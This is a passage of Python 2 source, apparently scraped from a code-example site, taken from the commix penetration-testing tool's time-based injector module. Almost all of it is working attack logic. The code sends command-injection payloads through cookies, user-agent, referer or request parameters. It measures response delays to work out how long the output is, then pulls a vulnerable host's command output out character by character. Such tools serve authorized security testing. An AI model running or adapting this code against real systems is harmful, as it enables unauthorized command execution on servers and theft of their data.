      sys.stdout.write("[" +Fore.RED+ " FAILED " + Style.RESET_ALL+ "]")
      sys.stdout.flush() 
    else:
      print "" 
    check_how_long = 0
    output = ""

  if settings.VERBOSITY_LEVEL >= 1 and menu.options.ignore_session:
    print "" 
  return check_how_long, output
コード例 #6
0
ファイル: tfb_injector.py プロジェクト: doctordeep/commix
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if menu.options.file_write or menu.options.file_upload :
    minlen = 0
  else:
    minlen = 1
    
  found_chars = False

  sys.stdout.write("(*) Retrieving the length of execution output... ")
  sys.stdout.flush()  
  for output_length in range(int(minlen), int(maxlen)):
    
    # Execute shell commands on vulnerable host.
    if alter_shell :
      payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
    else:
      payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)  

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    if menu.options.base64:
      payload = base64.b64encode(payload)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
      sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
   
    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)

    else:
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url)
    
    if how_long >= delay:
      if output_length > 1:
        if menu.options.verbose:
          print "\n"
        else:
          sys.stdout.write("["+Fore.GREEN+" SUCCEED "+ Style.RESET_ALL+"]\n")
          sys.stdout.flush()
        print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters."+ Style.RESET_ALL
        found_chars = True
      break

  if found_chars == True :
    num_of_chars = output_length + 1
    check_start = 0
    check_end = 0
    check_start = time.time()
    
    output = []
    
    percent = 0
    sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ "+str(percent)+"% ]")
    sys.stdout.flush()

    for num_of_chars in range(1, int(num_of_chars)):
      for ascii_char in range(32, 129):
        
        # Get the execution ouput, of shell execution.
        if alter_shell :
          payload = tfb_payloads.get_char_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
        else:
          payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
          payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
          sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
        
        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
          how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
          how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
          how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
          how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

        if how_long >= delay:
          if not menu.options.verbose:
            output.append(chr(ascii_char))
            percent = ((num_of_chars*100)/output_length)
            float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(output_length * 1.0)),2))
            
            sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ "+str(float_percent)+"% ]")
            sys.stdout.flush()
          else:
            output.append(chr(ascii_char))
          break

    check_end  = time.time()
    check_how_long = int(check_end - check_start)
    output = "".join(str(p) for p in output)

  else:
    check_start = 0
    if not menu.options.verbose:
      sys.stdout.write("["+Fore.RED+" FAILED "+ Style.RESET_ALL+"]\n")
      sys.stdout.flush() 
    else:
      print "" 
    check_how_long = 0
    output = ""

  return  check_how_long, output